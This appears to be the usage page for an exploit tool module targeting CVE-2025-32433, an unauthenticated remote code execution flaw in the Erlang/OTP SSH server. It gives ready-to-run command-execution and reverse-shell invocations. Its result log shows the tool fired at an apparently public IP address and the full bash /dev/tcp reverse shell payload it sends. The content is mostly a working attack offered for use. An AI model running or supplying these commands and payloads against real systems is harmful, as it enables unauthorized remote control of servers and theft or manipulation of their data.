CVE-2025-32433 Erlang/OTP SSH RCE EXP

Description

A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.

Affected Versions

OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier

Features

Exploit Execution: Execute arbitrary commands.
Reverse Shell: Initiate a bash-based reverse shell.

Usage

Usage:
Ladon CVE-2025-32433 <target_ip> <target_port> [mode] [options]

Modes:

Command Execution Mode:
Ladon CVE-2025-32433 <target_ip> <target_port> cmd “”

Example:
1
Ladon CVE-2025-32433 192.168.18.9 2222 cmd "id>888.txt"
Reverse Shell Mode:
Ladon CVE-2025-32433 <target_ip> <target_port> shell <local_ip> <local_port>

Example:
1
Ladon CVE-2025-32433 192.168.18.9 2222 shell 192.168.18.203 4444

Result

C:\Users\Administrator\Desktop\Ladon12>Ladon CVE-2025-32433 185.164.148.243 7777 shell 192.168.1.1 4444

Load CVE-2025-32433
[*] Sending reverse shell to connect back to 192.168.1.1:4444
[*] Connecting to target...
[+] Received banner: SSH-2.0-Erlang/4.7.6.3
[+] Running command: os:cmd("bash -c 'exec 5<>/dev/tcp/192.168.1.1/4444; cat <&5 | while read line; do $line 2>&5 >&5; done'").
[√] Exploit sent. If vulnerable, command should execute.
[+] Reverse shell command sent. Check your listener.